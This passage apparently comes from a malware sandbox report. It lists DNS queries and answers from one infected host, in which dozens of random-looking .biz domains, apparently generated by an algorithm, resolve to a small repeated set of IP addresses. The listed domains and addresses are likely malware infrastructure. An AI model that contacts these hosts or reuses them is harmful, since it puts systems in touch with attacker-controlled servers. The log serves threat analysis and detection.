                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.629144907 CET192.168.2.51.1.1.10x4528Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.613784075 CET192.168.2.51.1.1.10x5a6dStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.481059074 CET192.168.2.51.1.1.10xe503Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.334994078 CET192.168.2.51.1.1.10x179fStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.195916891 CET192.168.2.51.1.1.10x2dbfStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.225258112 CET192.168.2.51.1.1.10x2dbfStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.323522091 CET192.168.2.51.1.1.10xe2c2Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040815115 CET192.168.2.51.1.1.10x4a96Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.049976110 CET192.168.2.51.1.1.10xba4fStandard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.726229906 CET192.168.2.51.1.1.10x3b71Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.426347971 CET192.168.2.51.1.1.10x8436Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.890336990 CET192.168.2.51.1.1.10xed7dStandard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.565340042 CET192.168.2.51.1.1.10x51b1Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.048366070 CET192.168.2.51.1.1.10x5ea5Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.178684950 CET192.168.2.51.1.1.10xa951Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.878850937 CET192.168.2.51.1.1.10x8531Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.732358932 CET192.168.2.51.1.1.10x55fbStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.681616068 CET192.168.2.51.1.1.10x55f8Standard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.709644079 CET192.168.2.51.1.1.10x55f8Standard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.869496107 CET192.168.2.51.1.1.10xc52aStandard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.791812897 CET192.168.2.51.1.1.10x2dcdStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.249466896 CET192.168.2.51.1.1.10xabd0Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.272289991 CET192.168.2.51.1.1.10xabd0Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.838620901 CET192.168.2.51.1.1.10x2ad4Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.525034904 CET192.168.2.51.1.1.10xa4e4Standard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.224611044 CET192.168.2.51.1.1.10x2abfStandard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.240909100 CET192.168.2.51.1.1.10x2abfStandard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.000179052 CET192.168.2.51.1.1.10x6e7aStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.882416964 CET192.168.2.51.1.1.10x74cfStandard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.572091103 CET192.168.2.51.1.1.10xeea7Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.429893970 CET192.168.2.51.1.1.10x9b2dStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.273001909 CET192.168.2.51.1.1.10x3390Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085882902 CET192.168.2.51.1.1.10x6b33Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.534456968 CET192.168.2.51.1.1.10xe813Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.220501900 CET192.168.2.51.1.1.10x1790Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.909151077 CET192.168.2.51.1.1.10x4ef8Standard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.367496014 CET192.168.2.51.1.1.10xd87dStandard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.397169113 CET192.168.2.51.1.1.10xd87dStandard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.183563948 CET192.168.2.51.1.1.10xf4bStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.885880947 CET192.168.2.51.1.1.10xf19bStandard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.265113115 CET192.168.2.51.1.1.10xe5e0Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.286562920 CET192.168.2.51.1.1.10x6b5eStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.717844963 CET192.168.2.51.1.1.10x48e5Standard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.565366983 CET192.168.2.51.1.1.10xfccfStandard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.584656000 CET192.168.2.51.1.1.10xfccfStandard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.120029926 CET192.168.2.51.1.1.10x3b71Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.803026915 CET192.168.2.51.1.1.10x7275Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.773544073 CET192.168.2.51.1.1.10x17b6Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.783262014 CET192.168.2.51.1.1.10xee65Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.803380013 CET192.168.2.51.1.1.10xee65Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.833779097 CET192.168.2.51.1.1.10x545eStandard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.850354910 CET192.168.2.51.1.1.10x545eStandard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.724124908 CET192.168.2.51.1.1.10x869fStandard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.611879110 CET192.168.2.51.1.1.10xa936Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.472476959 CET192.168.2.51.1.1.10x9812Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.490998983 CET192.168.2.51.1.1.10x9812Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.424464941 CET192.168.2.51.1.1.10xce81Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.273962021 CET192.168.2.51.1.1.10x9b59Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.715226889 CET192.168.2.51.1.1.10xe00dStandard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.567548990 CET192.168.2.51.1.1.10xf0bbStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.584938049 CET192.168.2.51.1.1.10xf0bbStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.344449997 CET192.168.2.51.1.1.10xdc7Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.039546967 CET192.168.2.51.1.1.10x373fStandard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.898952007 CET192.168.2.51.1.1.10xd21eStandard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.587510109 CET192.168.2.51.1.1.10xe651Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.461843967 CET192.168.2.51.1.1.10x9973Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.177464962 CET192.168.2.51.1.1.10xebfcStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.104918957 CET192.168.2.51.1.1.10xee3bStandard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.964350939 CET192.168.2.51.1.1.10x556fStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.838552952 CET192.168.2.51.1.1.10xd3deStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.320836067 CET192.168.2.51.1.1.10x9996Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.580005884 CET192.168.2.51.1.1.10xe23Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.306361914 CET192.168.2.51.1.1.10x43f0Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.912970066 CET192.168.2.51.1.1.10xf12bStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.922346115 CET192.168.2.51.1.1.10x47bdStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.944669962 CET192.168.2.51.1.1.10x47bdStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.791177988 CET192.168.2.51.1.1.10x1135Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.806479931 CET192.168.2.51.1.1.10xc96fStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.815094948 CET192.168.2.51.1.1.10xc69aStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.860671997 CET1.1.1.1192.168.2.50x2f78No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.871634007 CET1.1.1.1192.168.2.50x587No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.014678955 CET1.1.1.1192.168.2.50xaf41No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.915004969 CET1.1.1.1192.168.2.50xa669No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.637240887 CET1.1.1.1192.168.2.50x6fbaNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.686670065 CET1.1.1.1192.168.2.50xd72No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.707448959 CET1.1.1.1192.168.2.50x266fNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.603594065 CET1.1.1.1192.168.2.50xbb71No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.604485035 CET1.1.1.1192.168.2.50x6bfbNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.604485035 CET1.1.1.1192.168.2.50x6bfbNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.156002045 CET1.1.1.1192.168.2.50x985aName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.166157961 CET1.1.1.1192.168.2.50xe1f5No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.689302921 CET1.1.1.1192.168.2.50x93eaName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.706392050 CET1.1.1.1192.168.2.50xa22cName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.715833902 CET1.1.1.1192.168.2.50x76cNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.877491951 CET1.1.1.1192.168.2.50x823aNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.978333950 CET1.1.1.1192.168.2.50xc051No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.944245100 CET1.1.1.1192.168.2.50x4390No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.700907946 CET1.1.1.1192.168.2.50x6f45No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.610321045 CET1.1.1.1192.168.2.50xca64No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.362464905 CET1.1.1.1192.168.2.50x290No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.362464905 CET1.1.1.1192.168.2.50x290No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.003856897 CET1.1.1.1192.168.2.50x55b6No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.228598118 CET1.1.1.1192.168.2.50xfe03No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.197299957 CET1.1.1.1192.168.2.50x62eeNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.317384005 CET1.1.1.1192.168.2.50xd361No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.290446997 CET1.1.1.1192.168.2.50x28cNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.299453020 CET1.1.1.1192.168.2.50xa259No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.459569931 CET1.1.1.1192.168.2.50x75a0No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.592896938 CET1.1.1.1192.168.2.50x11f5No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.370845079 CET1.1.1.1192.168.2.50x14e9No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.370845079 CET1.1.1.1192.168.2.50x14e9No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.744595051 CET1.1.1.1192.168.2.50x4e52No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.861124992 CET1.1.1.1192.168.2.50xdf55No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.853996992 CET1.1.1.1192.168.2.50x4171No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.141012907 CET1.1.1.1192.168.2.50x7839No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.255964994 CET1.1.1.1192.168.2.50xd1f6No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.037302017 CET1.1.1.1192.168.2.50x2199No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.192347050 CET1.1.1.1192.168.2.50xfafNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.514775991 CET1.1.1.1192.168.2.50x9680No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.133649111 CET1.1.1.1192.168.2.50x55edNo error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.384679079 CET1.1.1.1192.168.2.50x2620No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.760292053 CET1.1.1.1192.168.2.50x41fbNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.459930897 CET1.1.1.1192.168.2.50x181cNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.120539904 CET1.1.1.1192.168.2.50x5143No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.046371937 CET1.1.1.1192.168.2.50xd69eNo error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.676110983 CET1.1.1.1192.168.2.50x2099No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.339181900 CET1.1.1.1192.168.2.50x1066No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.208785057 CET1.1.1.1192.168.2.50xd766No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.180802107 CET1.1.1.1192.168.2.50x5701No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.051558018 CET1.1.1.1192.168.2.50x1220No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.050436020 CET1.1.1.1192.168.2.50xf12aNo error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.973980904 CET1.1.1.1192.168.2.50xfb3No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.454154015 CET1.1.1.1192.168.2.50x635dNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.644123077 CET1.1.1.1192.168.2.50xf29cNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.099509001 CET1.1.1.1192.168.2.50x93dcNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.858166933 CET1.1.1.1192.168.2.50xb1d7No error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.324261904 CET1.1.1.1192.168.2.50xbd9bNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.346837044 CET1.1.1.1192.168.2.50x4a54No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.832168102 CET1.1.1.1192.168.2.50x4a4eNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.326235056 CET1.1.1.1192.168.2.50xf03cNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.041331053 CET1.1.1.1192.168.2.50xeb53No error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.894041061 CET1.1.1.1192.168.2.50xf03eNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.775540113 CET1.1.1.1192.168.2.50xb940No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.775577068 CET1.1.1.1192.168.2.50xb940No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.640727997 CET1.1.1.1192.168.2.50x9a05No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.629086971 CET1.1.1.1192.168.2.50x1a38No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.068480015 CET1.1.1.1192.168.2.50x4a68No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.073437929 CET1.1.1.1192.168.2.50x814aNo error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.527640104 CET1.1.1.1192.168.2.50x84f9No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.251173973 CET1.1.1.1192.168.2.50xb8d1No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
